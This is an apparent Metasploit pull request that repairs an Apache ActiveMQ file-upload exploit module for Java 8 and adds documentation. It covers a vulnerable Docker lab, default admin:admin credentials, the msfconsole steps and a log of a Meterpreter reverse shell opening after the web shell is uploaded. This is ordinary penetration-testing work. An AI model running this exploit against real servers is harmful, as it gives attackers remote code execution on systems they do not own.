### PR TITLE
Fix apache_activemq_upload_jsp exploit module for Java 8

### DIFF
--- a/documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
+++ b/documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
@@ -1,0 +1,117 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Apache ActiveMQ 5.x before 5.14.0 which
+allows remote attackers to upload and execute arbitrary files via an HTTP PUT
+followed by an HTTP MOVE request. By default, a JSP web shell and Java
+Meterpreter payload are uploaded to the `/fileserver/` path of a vulnerable
+server, then moved via an HTTP MOVE request to either `/api/` or `/admin/`.
+You should get a shell under the process running ActiveMQ.
+
+### Configuring a Vulnerable Environment
+
+To use a pre-built Docker image:
+
+```
+docker run -it -p 8161:8161 rmohr/activemq:5.10.0
+```
+
+To run an older version of ActiveMQ with Java 8, create a new `Dockerfile`:
+
+```
+FROM openjdk:8
+
+ENV ACTIVEMQ_VERSION 5.9.0
+ENV ACTIVEMQ apache-activemq-$ACTIVEMQ_VERSION
+
+ENV ACTIVEMQ_HOME /opt/activemq
+
+RUN \
+    curl -O http://archive.apache.org/dist/activemq/apache-activemq/$ACTIVEMQ_VERSION/$ACTIVEMQ-bin.tar.gz && \
+    mkdir -p /opt && \
+    tar xf $ACTIVEMQ-bin.tar.gz -C /opt/ && \
+    rm $ACTIVEMQ-bin.tar.gz && \
+    ln -s /opt/$ACTIVEMQ $ACTIVEMQ_HOME && \
+    useradd -r -M -d $ACTIVEMQ_HOME activemq && \
+    chown activemq:activemq /opt/$ACTIVEMQ -R
+
+USER activemq
+
+WORKDIR $ACTIVEMQ_HOME
+EXPOSE 61616 8161
+
+CMD ["/bin/bash", "-c", "bin/activemq console"]
+```
+
+Next build and run the application:
+
+```
+docker build -t activemq:5.9.0 .
+docker run -it -p 8161:8161 activemq:5.9.0
+```
+
+Verify the application is running by visiting
+`http://localhost:8161/admin/test/` with the credentials `admin:admin`
+
+## Verification Steps
+
+1. Run the application locally.
+1. Start msfconsole.
+1. Do: `use multi/http/apache_activemq_upload_jsp`.
+1. Do: `set rhosts <ip address of remote host> `.
+1. Do: `set lhost <ip address of local machine`.
+1. Do: `run`.
+1. You should get a shell under the process running ActiveMQ.
+
+## Options
+
+### AutoCleanup
+
+Remove web shells from the target system after callback is received (Default:
+true)
+
+### BasicAuthUser
+
+User-supplied username (Default: admin)
+
+### BasicAuthPass
+
+User-supplied password associated with username (Default: admin)
+
+### JSP
+
+Desired name to assign to the JSP web shell when it is uploaded to the target
+system. Do not include the `.jsp` extension (Default: randomly-generated string)
+
+## Advanced Options
+
+### UploadPath
+
+Custom path into which web shells will be uploaded on the target system. If the
+user determines that a nonstandard directory is able to execute .jsp files, the
+user can specify this directory for exploitation (Default: attempt `/api/`; if that
+fails, attempt `/admin/`)
+
+## Scenarios
+
+### Targeting ActiveMQ 5.9.0
+
+```
+$ msfconsole -q
+msf6 > use multi/http/apache_activemq_upload_jsp
+[*] Using configured payload java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/apache_activemq_upload_jsp) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf6 exploit(multi/http/apache_activemq_upload_jsp) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(multi/http/apache_activemq_upload_jsp) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/qQSWrsmnXtZ.jar
+[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/qQSWrsmnXtZ.jsp
+[*] Sending stage (58110 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:45634) at 2021-03-14 18:25:38 -0400
+[+] Deleted /opt/activemq/webapps/api/qQSWrsmnXtZ.jar
+[+] Deleted /opt/activemq/webapps/api/qQSWrsmnXtZ.jsp
+
+meterpreter >
+```

--- a/documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
+++ b/documentation/modules/exploit/multi/http/apache_activemq_upload_jsp.md
@@ -5,7 +5,7 @@ allows remote attackers to upload and execute arbitrary files via an HTTP PUT
 followed by an HTTP MOVE request. By default, a JSP web shell and Java
 Meterpreter payload are uploaded to the `/fileserver/` path of a vulnerable
 server, then moved via an HTTP MOVE request to either `/api/` or `/admin/`.
-You should get a shell under the process running ActiveMQ.
+You should get a shell as the user running ActiveMQ.
 
 ### Configuring a Vulnerable Environment
 

--- a/modules/exploits/multi/http/apache_activemq_upload_jsp.rb
+++ b/modules/exploits/multi/http/apache_activemq_upload_jsp.rb
@@ -110,8 +110,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_install_path
-    properties_page = send_request('GET', "#{@url}/admin/test/systemProperties.jsp").body
-    match = properties_page.tr("\n", '@').match(/activemq\.home<\/td>@\s*<td>([^@]+)<\/td>/)
+    properties_page = send_request('GET', "#{@url}/admin/test/").body
+    match = properties_page.match(/activemq\.home=([^,}]+)/)
     return match[1] unless match.nil?
   end
 


### PR DESCRIPTION
Fixes apache_activemq_upload_jsp exploit module to work with Java 8 and adds module documentation

This module was broken for me against a target using Java 8 and ApacheMQ 5.9.0

The module attempts visits `/admin/test/systemProperties.jsp` which for some reason on Java 8 gives a 500 response without the required system information:
![image](https://user-images.githubusercontent.com/1271782/111086954-e4d6f700-8516-11eb-88a3-b0210c98b012.png)

With curl:

```
curl --user admin:admin -v http://localhost:8161/admin/test/systemProperties.jsp
*   Trying ::1:8161...
* TCP_NODELAY set
* Connected to localhost (::1) port 8161 (#0)
* Server auth using Basic with user 'admin'
> GET /admin/test/systemProperties.jsp HTTP/1.1
> Host: localhost:8161
> Authorization: Basic YWRtaW46YWRtaW4=
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 PWC6033: Unable to compile class for JSP  PWC6197: An error occurred at line: 36 in the jsp file: /test/systemProperties.jsp PWC6199: Generated servlet error: The type java.util.Map$Entry cannot be resolved. It is indirectly referenced from required .class files  
< Set-Cookie: JSESSIONID=4rofdf22s8v1rwlfllvr2b7d;Path=/admin
< Accept-Ranges: bytes
< Content-Type: text/html
< Content-Length: 5909
< Last-Modified: Mon, 14 Oct 2013 22:41:48 GMT
< Server: Jetty(7.6.9.v20130131)
< 
```

I've updated the module to use `/admin/test/` instead which has the same data:

![image](https://user-images.githubusercontent.com/1271782/111086932-d092fa00-8516-11eb-9de4-1be40a3331a1.png)

## Verification

Verification steps are in the read me, they were mostly pulled from the original pull request here https://github.com/rapid7/metasploit-framework/pull/8519.

Note that I verified this works with versions 5.0.2, 5.0.6, and 5.0.7, 5.0.9 on Java 8, and with 5.0.10 and 5.0.11 with Java 7. However, it seemed that this module doesn't work with 5.0.12 or 5.0.13 - even though the advisory claims those versions are impacted. Additional work may be required to fix those versions. I don't believe this has been tested against a windows target.